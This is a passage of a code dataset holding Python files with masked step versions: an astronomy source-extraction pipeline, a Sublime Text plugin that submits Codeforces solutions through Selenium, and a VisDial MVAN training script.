os.path.exists(psf_loc)\n length = len(data) + 1\n if check == False:\n os.system(\"mkdir %s\" % (psf_loc))\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = \"PARAMETERS_NAME\" + \" \" + location + \"/configs/default.psfex\" + \"\\n\"\n data[20] = \"FILTER_NAME\" + \" \" + location + \"/configs/default.conv\" + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print(\"\\n-> Creating PSF catalog of fake image...\")\n name = image[length:-5]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6] = \"CATALOG_NAME\" + \" \" + psf_loc + \"/\" + name + \".cat\" + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system(\"sextractor %s[0] -c %s\" % (image, config_loc))\n \ndef weight_map(image):\n hdu = fits.open(image)\n hduMask = hdu[1].data\n zeroMask = np.zeros(hduMask.shape)\n weightMap = (np.logical_not(np.logical_or(hduMask,zeroMask))).astype(float)\n hdu.close()\n return weightMap\n\ndef src_join(location):\n source_loc = location + '/sources'\n temp_source_loc = source_loc + '/temp'\n temp_source_files = glob.glob(temp_source_loc + '/*.txt')\n image_names = filters.get_image_names(location)\n for file in temp_source_files:\n with open(file, 'r') as fl:\n data = fl.readlines()\n data = [str(file.replace('txt','fits')[len(source_loc)+6:]) + '\\n'] + data\n data.append(\"\\n\\n\\n\")\n with open(source_loc + '/sources.txt', 'a+') as s:\n if data[0] not in image_names:\n s.writelines(data)\n os.remove(file)\n try:\n os.rmdir(temp_source_loc)\n except:\n print(\"-> Error: Problem removing temp directory in '/sources'\")\n\ndef filter_sources(location, mask_sources=False):\n print(\"\\n-> Filtering out non PSF-like sources...\")\n filters.spread_model_filter(location)\n print(\"-> Filtering out diveted detections...\")\n images = glob.glob(location + '/data/*_A_.fits')\n for i in images:\n indices = filters.divot(i)\n filters.update_filtered_sources(location, indices)\n residuals = glob.glob(\"%s/residuals/*_residual_.fits\" % (location))\n if mask_sources == True:\n for r in residuals:\n filters.mask_sources_image(r)\n \ndef MR_filter_sources(location):\n with open(\"%s/sources/MR_sources.txt\" % (location), 'r') as MR_src:\n MR_lines = MR_src.readlines()\n MR_lines.insert(0, \"MR.fits\\n\")\n with open(\"%s/sources/MR_sources.txt\" % (location), 'w+') as MR_src:\n for line in MR_lines:\n MR_src.write(line)\n MR_loc = \"%s/residuals/MR.fits\" % (location)\n print(\"\\n-> Filtering out non PSF-like sources in master residual...\")\n filters.spread_model_filter(location, MR=True)\n print(\"-> Filtering out diveted detections in master residual...\")\n indices = filters.divot(MR_loc, MR=True)\n filters.update_filtered_sources(location, indices, MR=True)\n filters.write_total_sources(location)\n \ndef append_negative_sources(residual, MR=False):\n location = residual.split('/')[:-2]\n location = '/'.join(location)\n name = residual.split('/')[-1]\n name = name.replace('.fits', '')\n if MR == True:\n with open(\"%s/sources/%s_sources_2.txt\" % (location, name), 'r') as neg_sources:\n lines = neg_sources.readlines()\n with open(\"%s/sources/%s_sources.txt\" % (location, name), 'a') as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove(\"%s/sources/%s_sources_2.txt\" % (location, name))\n else:\n with open(\"%s/sources/temp/%s_2.txt\" % (location, name), 'r') as neg_sources:\n lines = neg_sources.readlines()\n with open(\"%s/sources/temp/%s.txt\" % (location, name), 'a') as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove(\"%s/sources/temp/%s_2.txt\" % (location, name))",
"step-ids": [
8,
9,
10,
11,
12
]
}
|
[
8,
9,
10,
11,
12
] |
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import sublime
import sublime_plugin
"""
Copy and Paste selinium module and urllib3 module of Python in
"sublime-text-3/Lib/Python3.3" folder of sublime-text3
"""
def process(string):
# Get active file name
filename = sublime.active_window().active_view().file_name()
contestid, problem = string.strip().split()
# Change executor_url according to your preference
executor_url = "127.0.0.1:9222" # change 9222 to the port you have used.
url = "codeforces.com/contest/" + contestid + "/problem/" + problem
_chrome_options = Options()
_chrome_options.add_argument('disable-infobars')
_chrome_options.add_argument("--start-maximized")
_chrome_options.add_experimental_option("debuggerAddress", executor_url)
try:
driver = webdriver.Chrome(options=_chrome_options)
driver.implicitly_wait(30)
try:
driver.get("http://" + url.rstrip())
driver.find_element_by_name("sourceFile")
driver.find_element_by_css_selector('input[type="file"]').clear()
# Send File to Codeforces
driver.find_element_by_css_selector(
'input[type="file"]').send_keys(filename.rstrip())
# Click on submit button
driver.find_element_by_class_name("submit").click()
except Exception:
# In case Codeforces is too busy or File is untitled.
sublime.error_message('Either Codeforces is too busy or \
File is Untitled.')
except Exception:
# In case Server is not active.
sublime.error_message('Server is not active.')
class SolveItCommand(sublime_plugin.TextCommand):
"""
Submit solution from sublime by getting contest ID and problem ID
from the user
"""
def run(self, _):
window = self.view.window()
# Input Panel to get Contest ID and Problem ID from the user
window.show_input_panel(
"Enter ContestID & ProblemID : ",
"",
self.on_done,
self.on_change,
self.on_cancel)
def on_done(self, input_data):
process(input_data)
def on_change(self, input_data):
pass
def on_cancel(self):
pass
|
normal
|
{
"blob_id": "9767014992981001bd2e8dece67525650c05a2a8",
"index": 4018,
"step-1": "<mask token>\n\n\nclass SolveItCommand(sublime_plugin.TextCommand):\n <mask token>\n\n def run(self, _):\n window = self.view.window()\n window.show_input_panel('Enter ContestID & ProblemID : ', '', self.\n on_done, self.on_change, self.on_cancel)\n\n def on_done(self, input_data):\n process(input_data)\n <mask token>\n\n def on_cancel(self):\n pass\n",
"step-2": "<mask token>\n\n\nclass SolveItCommand(sublime_plugin.TextCommand):\n \"\"\"\n Submit solution from sublime by getting contest ID and problem ID\n from the user\n \"\"\"\n\n def run(self, _):\n window = self.view.window()\n window.show_input_panel('Enter ContestID & ProblemID : ', '', self.\n on_done, self.on_change, self.on_cancel)\n\n def on_done(self, input_data):\n process(input_data)\n\n def on_change(self, input_data):\n pass\n\n def on_cancel(self):\n pass\n",
"step-3": "<mask token>\n\n\ndef process(string):\n filename = sublime.active_window().active_view().file_name()\n contestid, problem = string.strip().split()\n executor_url = '127.0.0.1:9222'\n url = 'codeforces.com/contest/' + contestid + '/problem/' + problem\n _chrome_options = Options()\n _chrome_options.add_argument('disable-infobars')\n _chrome_options.add_argument('--start-maximized')\n _chrome_options.add_experimental_option('debuggerAddress', executor_url)\n try:\n driver = webdriver.Chrome(options=_chrome_options)\n driver.implicitly_wait(30)\n try:\n driver.get('http://' + url.rstrip())\n driver.find_element_by_name('sourceFile')\n driver.find_element_by_css_selector('input[type=\"file\"]').clear()\n driver.find_element_by_css_selector('input[type=\"file\"]'\n ).send_keys(filename.rstrip())\n driver.find_element_by_class_name('submit').click()\n except Exception:\n sublime.error_message(\n 'Either Codeforces is too busy or File is Untitled.'\n )\n except Exception:\n sublime.error_message('Server is not active.')\n\n\nclass SolveItCommand(sublime_plugin.TextCommand):\n \"\"\"\n Submit solution from sublime by getting contest ID and problem ID\n from the user\n \"\"\"\n\n def run(self, _):\n window = self.view.window()\n window.show_input_panel('Enter ContestID & ProblemID : ', '', self.\n on_done, self.on_change, self.on_cancel)\n\n def on_done(self, input_data):\n process(input_data)\n\n def on_change(self, input_data):\n pass\n\n def on_cancel(self):\n pass\n",
"step-4": "from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport sublime\nimport sublime_plugin\n<mask token>\n\n\ndef process(string):\n filename = sublime.active_window().active_view().file_name()\n contestid, problem = string.strip().split()\n executor_url = '127.0.0.1:9222'\n url = 'codeforces.com/contest/' + contestid + '/problem/' + problem\n _chrome_options = Options()\n _chrome_options.add_argument('disable-infobars')\n _chrome_options.add_argument('--start-maximized')\n _chrome_options.add_experimental_option('debuggerAddress', executor_url)\n try:\n driver = webdriver.Chrome(options=_chrome_options)\n driver.implicitly_wait(30)\n try:\n driver.get('http://' + url.rstrip())\n driver.find_element_by_name('sourceFile')\n driver.find_element_by_css_selector('input[type=\"file\"]').clear()\n driver.find_element_by_css_selector('input[type=\"file\"]'\n ).send_keys(filename.rstrip())\n driver.find_element_by_class_name('submit').click()\n except Exception:\n sublime.error_message(\n 'Either Codeforces is too busy or File is Untitled.'\n )\n except Exception:\n sublime.error_message('Server is not active.')\n\n\nclass SolveItCommand(sublime_plugin.TextCommand):\n \"\"\"\n Submit solution from sublime by getting contest ID and problem ID\n from the user\n \"\"\"\n\n def run(self, _):\n window = self.view.window()\n window.show_input_panel('Enter ContestID & ProblemID : ', '', self.\n on_done, self.on_change, self.on_cancel)\n\n def on_done(self, input_data):\n process(input_data)\n\n def on_change(self, input_data):\n pass\n\n def on_cancel(self):\n pass\n",
"step-5": "from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\nimport sublime\nimport sublime_plugin\n\n\"\"\"\nCopy and Paste selinium module and urllib3 module of Python in\n\"sublime-text-3/Lib/Python3.3\" folder of sublime-text3\n\"\"\"\n\n\ndef process(string):\n\n # Get active file name\n filename = sublime.active_window().active_view().file_name()\n contestid, problem = string.strip().split()\n\n # Change executor_url according to your preference\n executor_url = \"127.0.0.1:9222\" # change 9222 to the port you have used.\n url = \"codeforces.com/contest/\" + contestid + \"/problem/\" + problem\n\n _chrome_options = Options()\n _chrome_options.add_argument('disable-infobars')\n _chrome_options.add_argument(\"--start-maximized\")\n _chrome_options.add_experimental_option(\"debuggerAddress\", executor_url)\n try:\n driver = webdriver.Chrome(options=_chrome_options)\n driver.implicitly_wait(30)\n\n try:\n driver.get(\"http://\" + url.rstrip())\n driver.find_element_by_name(\"sourceFile\")\n driver.find_element_by_css_selector('input[type=\"file\"]').clear()\n # Send File to Codeforces\n driver.find_element_by_css_selector(\n 'input[type=\"file\"]').send_keys(filename.rstrip())\n # Click on submit button\n driver.find_element_by_class_name(\"submit\").click()\n except Exception:\n # In case Codeforces is too busy or File is untitled.\n sublime.error_message('Either Codeforces is too busy or \\\n File is Untitled.')\n except Exception:\n # In case Server is not active.\n sublime.error_message('Server is not active.')\n\n\nclass SolveItCommand(sublime_plugin.TextCommand):\n \"\"\"\n Submit solution from sublime by getting contest ID and problem ID\n from the user\n \"\"\"\n def run(self, _):\n window = self.view.window()\n # Input Panel to get Contest ID and Problem ID from the user\n window.show_input_panel(\n \"Enter ContestID & ProblemID : \",\n \"\",\n self.on_done,\n self.on_change,\n self.on_cancel)\n\n def on_done(self, input_data):\n process(input_data)\n\n def on_change(self, input_data):\n pass\n\n def on_cancel(self):\n pass\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
import logging
import itertools
import torch
from torch import nn, optim
from torch.optim import lr_scheduler
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
from setproctitle import setproctitle
from bisect import bisect
from datetime import datetime
import numpy as np
from data.dataset import VisDialDataset
from visdial.encoders import Encoder
from visdial.decoders import Decoder
from visdial.model import EncoderDecoderModel
from visdial.utils.checkpointing import CheckpointManager, load_checkpoint
from single_evaluation import Evaluation
class MVAN(object):
def __init__(self, hparams):
self.hparams = hparams
self._logger = logging.getLogger(__name__)
np.random.seed(hparams.random_seed[0])
torch.manual_seed(hparams.random_seed[0])
torch.cuda.manual_seed_all(hparams.random_seed[0])
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
self.device = (
torch.device("cuda", self.hparams.gpu_ids[0])
if self.hparams.gpu_ids[0] >= 0
else torch.device("cpu")
)
setproctitle(hparams.dataset_version + '_' + hparams.model_name + '_' + str(hparams.random_seed[0]))
# def _build_data_process(self):
def _build_dataloader(self):
# =============================================================================
# SETUP DATASET, DATALOADER
# =============================================================================
old_split = "train" if self.hparams.dataset_version == "0.9" else None
self.train_dataset = VisDialDataset(
self.hparams,
overfit=self.hparams.overfit,
split="train",
old_split = old_split
)
collate_fn = None
if "dan" in self.hparams.img_feature_type:
collate_fn = self.train_dataset.collate_fn
self.train_dataloader = DataLoader(
self.train_dataset,
batch_size=self.hparams.train_batch_size,
num_workers=self.hparams.cpu_workers,
shuffle=True,
drop_last=True,
collate_fn=collate_fn,
)
print("""
# -------------------------------------------------------------------------
# DATALOADER FINISHED
# -------------------------------------------------------------------------
""")
def _build_model(self):
# =============================================================================
# MODEL : Encoder, Decoder
# =============================================================================
print('\t* Building model...')
# Pass vocabulary to construct Embedding layer.
encoder = Encoder(self.hparams, self.train_dataset.vocabulary)
decoder = Decoder(self.hparams, self.train_dataset.vocabulary)
print("Encoder: {}".format(self.hparams.encoder))
print("Decoder: {}".format(self.hparams.decoder))
# New: Initializing word_embed using GloVe
if self.hparams.glove_npy != '':
encoder.word_embed.weight.data = torch.from_numpy(np.load(self.hparams.glove_npy))
print("Loaded glove vectors from {}".format(self.hparams.glove_npy))
# Share word embedding between encoder and decoder.
decoder.word_embed = encoder.word_embed
# Wrap encoder and decoder in a model.
self.model = EncoderDecoderModel(encoder, decoder)
self.model = self.model.to(self.device)
# Use Multi-GPUs
if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:
self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)
# =============================================================================
# CRITERION
# =============================================================================
if "disc" in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss()
elif "gen" in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss(ignore_index=self.train_dataset.vocabulary.PAD_INDEX)
# Total Iterations -> for learning rate scheduler
if self.hparams.training_splits == "trainval":
self.iterations = (len(self.train_dataset) + len(self.valid_dataset)) // self.hparams.virtual_batch_size
else:
self.iterations = len(self.train_dataset) // self.hparams.virtual_batch_size
# =============================================================================
# OPTIMIZER, SCHEDULER
# =============================================================================
def lr_lambda_fun(current_iteration: int) -> float:
"""Returns a learning rate multiplier.
Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,
and then gets multiplied by `lr_gamma` every time a milestone is crossed.
"""
current_epoch = float(current_iteration) / self.iterations
if current_epoch <= self.hparams.warmup_epochs:
alpha = current_epoch / float(self.hparams.warmup_epochs)
return self.hparams.warmup_factor * (1.0 - alpha) + alpha
else:
return_val = 1.0
if current_epoch >= self.hparams.lr_milestones[0] and current_epoch < self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones, current_epoch)
return_val = pow(self.hparams.lr_gamma, idx)
elif current_epoch >= self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones2, current_epoch)
return_val = self.hparams.lr_gamma * pow(self.hparams.lr_gamma2, idx)
return return_val
if self.hparams.lr_scheduler == "LambdaLR":
self.optimizer = optim.Adam(self.model.parameters(), lr=self.hparams.initial_lr)
self.scheduler = lr_scheduler.LambdaLR(self.optimizer, lr_lambda=lr_lambda_fun)
else:
raise NotImplementedError
print(
"""
# -------------------------------------------------------------------------
# Model Build Finished
# -------------------------------------------------------------------------
"""
)
def _setup_training(self):
if self.hparams.save_dirpath == 'checkpoints/':
self.save_dirpath = os.path.join(self.hparams.root_dir, self.hparams.save_dirpath)
self.summary_writer = SummaryWriter(self.save_dirpath)
self.checkpoint_manager = CheckpointManager(
self.model, self.optimizer, self.save_dirpath, hparams=self.hparams
)
# If loading from checkpoint, adjust start epoch and load parameters.
if self.hparams.load_pthpath == "":
self.start_epoch = 1
else:
# "path/to/checkpoint_xx.pth" -> xx
self.start_epoch = int(self.hparams.load_pthpath.split("_")[-1][:-4])
self.start_epoch += 1
model_state_dict, optimizer_state_dict = load_checkpoint(self.hparams.load_pthpath)
if isinstance(self.model, nn.DataParallel):
self.model.module.load_state_dict(model_state_dict)
else:
self.model.load_state_dict(model_state_dict)
self.optimizer.load_state_dict(optimizer_state_dict)
self.previous_model_path = self.hparams.load_pthpath
print("Loaded model from {}".format(self.hparams.load_pthpath))
print(
"""
# -------------------------------------------------------------------------
# Setup Training Finished
# -------------------------------------------------------------------------
"""
)
def _loss_fn(self, epoch, batch, output):
target = (batch["ans_ind"] if "disc" in self.hparams.decoder else batch["ans_out"])
batch_loss = self.criterion(output.view(-1, output.size(-1)), target.view(-1).to(self.device))
return batch_loss
def train(self):
self._build_dataloader()
self._build_model()
self._setup_training()
# Evaluation Setup
evaluation = Evaluation(self.hparams, model=self.model, split="val")
# Forever increasing counter to keep track of iterations (for tensorboard log).
global_iteration_step = (self.start_epoch - 1) * self.iterations
running_loss = 0.0 # New
train_begin = datetime.utcnow() # New
print(
"""
# -------------------------------------------------------------------------
# Model Train Starts (NEW)
# -------------------------------------------------------------------------
"""
)
for epoch in range(self.start_epoch, self.hparams.num_epochs):
self.model.train()
# -------------------------------------------------------------------------
# ON EPOCH START (combine dataloaders if training on train + val)
# -------------------------------------------------------------------------
combined_dataloader = itertools.chain(self.train_dataloader)
print(f"\nTraining for epoch {epoch}:", "Total Iter:", self.iterations)
tqdm_batch_iterator = tqdm(combined_dataloader)
accumulate_batch = 0 # taesun New
for i, batch in enumerate(tqdm_batch_iterator):
buffer_batch = batch.copy()
for key in batch:
buffer_batch[key] = buffer_batch[key].to(self.device)
output = self.model(buffer_batch)
batch_loss = self._loss_fn(epoch, batch, output)
batch_loss.backward()
accumulate_batch += batch["img_ids"].shape[0]
if self.hparams.virtual_batch_size == accumulate_batch \
or i == (len(self.train_dataset) // self.hparams.train_batch_size): # last batch
self.optimizer.step()
# --------------------------------------------------------------------
# Update running loss and decay learning rates
# --------------------------------------------------------------------
if running_loss > 0.0:
running_loss = 0.95 * running_loss + 0.05 * batch_loss.item()
else:
running_loss = batch_loss.item()
self.optimizer.zero_grad()
accumulate_batch = 0
self.scheduler.step(global_iteration_step)
global_iteration_step += 1
# torch.cuda.empty_cache()
description = "[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]".format(
datetime.utcnow() - train_begin,
epoch,
global_iteration_step, running_loss,
self.optimizer.param_groups[0]['lr'])
tqdm_batch_iterator.set_description(description)
# tensorboard
if global_iteration_step % self.hparams.tensorboard_step == 0:
description = "[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]".format(
datetime.utcnow() - train_begin,
epoch,
global_iteration_step, running_loss,
self.optimizer.param_groups[0]['lr'],
)
self._logger.info(description)
# tensorboard writing scalar
self.summary_writer.add_scalar(
"train/loss", batch_loss, global_iteration_step
)
self.summary_writer.add_scalar(
"train/lr", self.optimizer.param_groups[0]["lr"], global_iteration_step
)
# -------------------------------------------------------------------------
# ON EPOCH END (checkpointing and validation)
# -------------------------------------------------------------------------
self.checkpoint_manager.step(epoch)
self.previous_model_path = os.path.join(self.checkpoint_manager.ckpt_dirpath, "checkpoint_%d.pth" % (epoch))
self._logger.info(self.previous_model_path)
if epoch < self.hparams.num_epochs - 1 and self.hparams.dataset_version == '0.9':
continue
torch.cuda.empty_cache()
evaluation.run_evaluate(self.previous_model_path, global_iteration_step, self.summary_writer,
os.path.join(self.checkpoint_manager.ckpt_dirpath, "ranks_%d_valid.json" % epoch))
torch.cuda.empty_cache()
return self.previous_model_path
|
normal
|
{
"blob_id": "4d1900c1a0a8d7639e0ec16fb0128fd8efc2e8a1",
"index": 9913,
"step-1": "<mask token>\n\n\nclass MVAN(object):\n <mask token>\n <mask token>\n <mask token>\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.\n hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(self.model, self.\n optimizer, self.save_dirpath, hparams=self.hparams)\n if self.hparams.load_pthpath == '':\n self.start_epoch = 1\n else:\n self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]\n [:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.\n hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print('Loaded model from {}'.format(self.hparams.load_pthpath))\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[\n 'ans_out']\n batch_loss = self.criterion(output.view(-1, output.size(-1)),\n target.view(-1).to(self.device))\n return batch_loss\n\n def train(self):\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n evaluation = Evaluation(self.hparams, model=self.model, split='val')\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n running_loss = 0.0\n train_begin = datetime.utcnow()\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n combined_dataloader = itertools.chain(self.train_dataloader)\n print(f'\\nTraining for epoch {epoch}:', 'Total Iter:', self.\n iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n accumulate_batch += batch['img_ids'].shape[0]\n if (self.hparams.virtual_batch_size == accumulate_batch or \n i == len(self.train_dataset) // self.hparams.\n train_batch_size):\n self.optimizer.step()\n if running_loss > 0.0:\n running_loss = (0.95 * running_loss + 0.05 *\n batch_loss.item())\n else:\n running_loss = batch_loss.item()\n self.optimizer.zero_grad()\n accumulate_batch = 0\n self.scheduler.step(global_iteration_step)\n global_iteration_step += 1\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.optimizer\n .param_groups[0]['lr']))\n tqdm_batch_iterator.set_description(description)\n if (global_iteration_step % self.hparams.\n tensorboard_step == 0):\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.\n optimizer.param_groups[0]['lr']))\n self._logger.info(description)\n self.summary_writer.add_scalar('train/loss',\n batch_loss, global_iteration_step)\n self.summary_writer.add_scalar('train/lr', self.\n optimizer.param_groups[0]['lr'],\n global_iteration_step)\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager\n .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)\n self._logger.info(self.previous_model_path)\n if (epoch < self.hparams.num_epochs - 1 and self.hparams.\n dataset_version == '0.9'):\n continue\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path,\n global_iteration_step, self.summary_writer, os.path.join(\n self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %\n epoch))\n torch.cuda.empty_cache()\n return self.previous_model_path\n",
"step-2": "<mask token>\n\n\nclass MVAN(object):\n <mask token>\n\n def _build_dataloader(self):\n old_split = 'train' if self.hparams.dataset_version == '0.9' else None\n self.train_dataset = VisDialDataset(self.hparams, overfit=self.\n hparams.overfit, split='train', old_split=old_split)\n collate_fn = None\n if 'dan' in self.hparams.img_feature_type:\n collate_fn = self.train_dataset.collate_fn\n self.train_dataloader = DataLoader(self.train_dataset, batch_size=\n self.hparams.train_batch_size, num_workers=self.hparams.\n cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # DATALOADER FINISHED\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _build_model(self):\n print('\\t* Building model...')\n encoder = Encoder(self.hparams, self.train_dataset.vocabulary)\n decoder = Decoder(self.hparams, self.train_dataset.vocabulary)\n print('Encoder: {}'.format(self.hparams.encoder))\n print('Decoder: {}'.format(self.hparams.decoder))\n if self.hparams.glove_npy != '':\n encoder.word_embed.weight.data = torch.from_numpy(np.load(self.\n hparams.glove_npy))\n print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)\n )\n decoder.word_embed = encoder.word_embed\n self.model = EncoderDecoderModel(encoder, decoder)\n self.model = self.model.to(self.device)\n if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:\n self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)\n if 'disc' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss()\n elif 'gen' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss(ignore_index=self.\n train_dataset.vocabulary.PAD_INDEX)\n if self.hparams.training_splits == 'trainval':\n self.iterations = (len(self.train_dataset) + len(self.\n valid_dataset)) // self.hparams.virtual_batch_size\n else:\n self.iterations = len(self.train_dataset\n ) // self.hparams.virtual_batch_size\n\n def lr_lambda_fun(current_iteration: int) ->float:\n \"\"\"Returns a learning rate multiplier.\n\n Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,\n and then gets multiplied by `lr_gamma` every time a milestone is crossed.\n \"\"\"\n current_epoch = float(current_iteration) / self.iterations\n if current_epoch <= self.hparams.warmup_epochs:\n alpha = current_epoch / float(self.hparams.warmup_epochs)\n return self.hparams.warmup_factor * (1.0 - alpha) + alpha\n else:\n return_val = 1.0\n if current_epoch >= self.hparams.lr_milestones[0\n ] and current_epoch < self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones, current_epoch)\n return_val = pow(self.hparams.lr_gamma, idx)\n elif current_epoch >= self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones2, current_epoch)\n return_val = self.hparams.lr_gamma * pow(self.hparams.\n lr_gamma2, idx)\n return return_val\n if self.hparams.lr_scheduler == 'LambdaLR':\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.\n hparams.initial_lr)\n self.scheduler = lr_scheduler.LambdaLR(self.optimizer,\n lr_lambda=lr_lambda_fun)\n else:\n raise NotImplementedError\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Build Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.\n hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(self.model, self.\n optimizer, self.save_dirpath, hparams=self.hparams)\n if self.hparams.load_pthpath == '':\n self.start_epoch = 1\n else:\n self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]\n [:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.\n hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print('Loaded model from {}'.format(self.hparams.load_pthpath))\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[\n 'ans_out']\n batch_loss = self.criterion(output.view(-1, output.size(-1)),\n target.view(-1).to(self.device))\n return batch_loss\n\n def train(self):\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n evaluation = Evaluation(self.hparams, model=self.model, split='val')\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n running_loss = 0.0\n train_begin = datetime.utcnow()\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n combined_dataloader = itertools.chain(self.train_dataloader)\n print(f'\\nTraining for epoch {epoch}:', 'Total Iter:', self.\n iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n accumulate_batch += batch['img_ids'].shape[0]\n if (self.hparams.virtual_batch_size == accumulate_batch or \n i == len(self.train_dataset) // self.hparams.\n train_batch_size):\n self.optimizer.step()\n if running_loss > 0.0:\n running_loss = (0.95 * running_loss + 0.05 *\n batch_loss.item())\n else:\n running_loss = batch_loss.item()\n self.optimizer.zero_grad()\n accumulate_batch = 0\n self.scheduler.step(global_iteration_step)\n global_iteration_step += 1\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.optimizer\n .param_groups[0]['lr']))\n tqdm_batch_iterator.set_description(description)\n if (global_iteration_step % self.hparams.\n tensorboard_step == 0):\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.\n optimizer.param_groups[0]['lr']))\n self._logger.info(description)\n self.summary_writer.add_scalar('train/loss',\n batch_loss, global_iteration_step)\n self.summary_writer.add_scalar('train/lr', self.\n optimizer.param_groups[0]['lr'],\n global_iteration_step)\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager\n .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)\n 